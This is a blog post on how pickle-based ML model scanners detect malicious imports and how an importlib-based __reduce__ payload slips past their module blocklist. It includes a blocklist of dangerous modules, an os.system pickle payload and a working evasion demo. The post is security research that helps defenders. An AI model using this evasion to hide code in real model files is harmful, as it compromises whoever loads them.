I Found a Way to Bypass AI Model Security Scanners — Here is What I Learned

Source: DEV Community
Machine learning model files can contain arbitrary code. Tools like ModelScan and PickleScan try to detect malicious payloads by scanning for dangerous Python modules in pickle bytecode. I spent a week testing these scanners. Here is what works and what does not.

How Model Scanners Work

ModelScan (by ProtectAI, used on HuggingFace) reads pickle bytecode one opcode at a time, extracting GLOBAL and STACK_GLOBAL imports. It checks these against a blocklist of dangerous modules:

- os, subprocess, sys, socket — blocked
- builtins (eval, exec, open) — blocked
- pickle, shutil, asyncio — blocked

If your pickle file imports any of these, the scanner flags it.

The Gap

The blocklist is finite. Python has hundreds of modules. Several can achieve code execution but are not on the list:

- importlib — can dynamically import any module at runtime
- operator — has methodcaller, which can invoke any method on any object
- marshal — can deserialize code objects
- types — can construct callable functions from code objects
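To make the scanning approach concrete, here is a minimal sketch of the GLOBAL/STACK_GLOBAL extraction idea, assuming a toy blocklist. The names `BLOCKLIST` and `flagged_imports` are illustrative, not ModelScan's actual API, and the opcode handling is simplified (real scanners track the pickle stack properly).

```python
import pickle
import pickletools

# Illustrative blocklist mirroring the list above — not ModelScan's real one
BLOCKLIST = {"os", "subprocess", "sys", "socket", "builtins",
             "pickle", "shutil", "asyncio"}

def flagged_imports(data: bytes) -> set:
    """Walk pickle opcodes without executing them, collect module names
    referenced by GLOBAL/STACK_GLOBAL, and return the blocklisted ones."""
    found = set()
    ops = list(pickletools.genops(data))
    for i, (op, arg, _pos) in enumerate(ops):
        if op.name == "GLOBAL":
            # arg is "module name" as one space-separated string
            found.add(arg.split(" ")[0])
        elif op.name == "STACK_GLOBAL":
            # simplification: module/name are the two most recent string pushes
            strings = [a for o, a, _ in ops[:i]
                       if o.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE")]
            if len(strings) >= 2:
                found.add(strings[-2])
    return {m for m in found if m.split(".")[0] in BLOCKLIST}

# Classic protocol-0 payload: a GLOBAL opcode importing os.system.
# We only scan these bytes; loading them would execute the command.
evil = b"cos\nsystem\n(S'echo pwned'\ntR."
```

Because `pickletools.genops` only parses the stream, the scan itself is safe to run on untrusted files; `flagged_imports(evil)` reports `os`, while a benign pickle such as `pickle.dumps([1, 2, 3])` reports nothing.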
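The gap is easy to demonstrate with a hypothetical payload class whose `__reduce__` routes through `importlib.import_module`. Given the blocklist above, a bytecode scan of the resulting pickle sees only `importlib` — the string `os` never appears as a GLOBAL import, yet loading the file imports the os module. (`Payload` is an illustrative name; whether this evades any particular scanner depends on its current blocklist.)

```python
import pickle
import pickletools
import importlib

class Payload:
    """Demo: defer the dangerous import to load time."""
    def __reduce__(self):
        # On unpickling, this calls importlib.import_module("os") and
        # returns the os module — no 'os' GLOBAL opcode in the stream.
        return (importlib.import_module, ("os",))

data = pickle.dumps(Payload(), protocol=2)  # protocol 2 emits GLOBAL opcodes

# What a bytecode scanner sees: only the literal GLOBAL module names
seen = {arg.split(" ")[0]
        for op, arg, _ in pickletools.genops(data)
        if op.name == "GLOBAL"}
```

Here `seen` contains `importlib` but not `os`, so a blocklist without `importlib` passes the file, even though `pickle.loads(data)` hands the attacker a live `os` module to chain further calls against.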